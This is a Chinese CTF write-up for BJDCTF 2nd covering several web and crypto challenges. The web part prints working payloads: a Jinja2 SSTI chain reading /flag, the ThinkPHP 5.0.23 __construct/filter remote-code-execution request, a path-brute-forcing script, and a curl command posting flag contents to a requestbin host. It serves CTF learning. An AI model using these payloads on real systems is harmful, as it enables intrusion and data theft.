BJDCTF 2nd-wp01

Web

1.fake google

BJDCTF 2nd-wp01_第1张图片
打开题目的主要界面是一个谷歌的搜索界面,在搜索框输入内容后会有一个新页面
BJDCTF 2nd-wp01_第2张图片
不管输入什么,输出都是P3’s girlfriend is :xxxxxxx
在这个页面查看源代码,发现有一段被注释的代码

<!--ssssssti & a little trick --> P3's girlfirend is : <script>alert(1);</script><br><hr>

从这段代码可以知道是ssti注入
试了试config,有回显
在这里插入图片描述
查看flag

{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}

在这里插入图片描述

flag{fc4ec771-f9e0-4ad4-afe0-80dfd22dab37}

2.old-hack


查看源码没有什么收获,主页上写的thinkphp5,而版本就是5.0.23
查看根目录,看到了flag

`POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

BJDCTF 2nd-wp01_第3张图片
查看flag

POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

BJDCTF 2nd-wp01_第4张图片

flag{da977af6-5828-4a37-9f5b-e1c1d8f25ed5}

3.假猪套天下第一

随便登陆就是这样的界面

抓包有hint,查看L0g1in.php
BJDCTF 2nd-wp01_第5张图片
卡了很久,大佬提示改时间戳
BJDCTF 2nd-wp01_第6张图片
得到了flag
BJDCTF 2nd-wp01_第7张图片

flag <!--ZmxhZ3s4YzImYzc3OC1INGYwLTQ2YWUtODM3YS 1mNDE4MDlwOGYyZTF9Cg==-->

4.


根据提示找到了po,但是没有flag
在这里插入图片描述
跑一遍周期表

import requests

url = 'http://a61c516a-de45-486f-a5ad-0a55e8fb4c8f.node3.buuoj.cn//{}.php'
s = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar', 'K', 'Ca','Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce','Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir','Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm','Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc','Lv', 'Ts', 'Og', 'Uue']
text = ''
for i in s:
    r = requests.get(url=url.format(i))
    if r.status_code != 404:
        print(i)
        text += r.text
        print(r.text)
        print(text)

5.duangShell

swp?直接index.php.swp
在这里插入图片描述
vim -r恢复
BJDCTF 2nd-wp01_第8张图片

curl http://requestbin.xxx -X POST -d "`head /flag`"

得到flag

Crypto

1.签到-y1ng

BJDCTF 2nd-wp01_第9张图片
直接base64解码 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ==

flag:BJD{W3lc0me_T0_BJDCTF}

2.老文盲了

BJDCTF 2nd-wp01_第10张图片
将文字转化为拼音可以知道文字就是flag

flag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝}

3.燕言燕语

在这里插入图片描述
通过题目解码得到如下明文,但并不是flag
在这里插入图片描述
有两端文字,想到了维吉尼亚密码
BJDCTF 2nd-wp01_第11张图片
yanzi就是密钥,后面的密文,千千秀字可以直接解密
BJDCTF 2nd-wp01_第12张图片

flag: BJD{yanzi_jiushige_shabi}

4.灵能精通

在这里插入图片描述
这是圣堂武士密码,猪圈密码的变种
BJDCTF 2nd-wp01_第13张图片

你可能感兴趣的:(BJDCTF 2nd-wp01)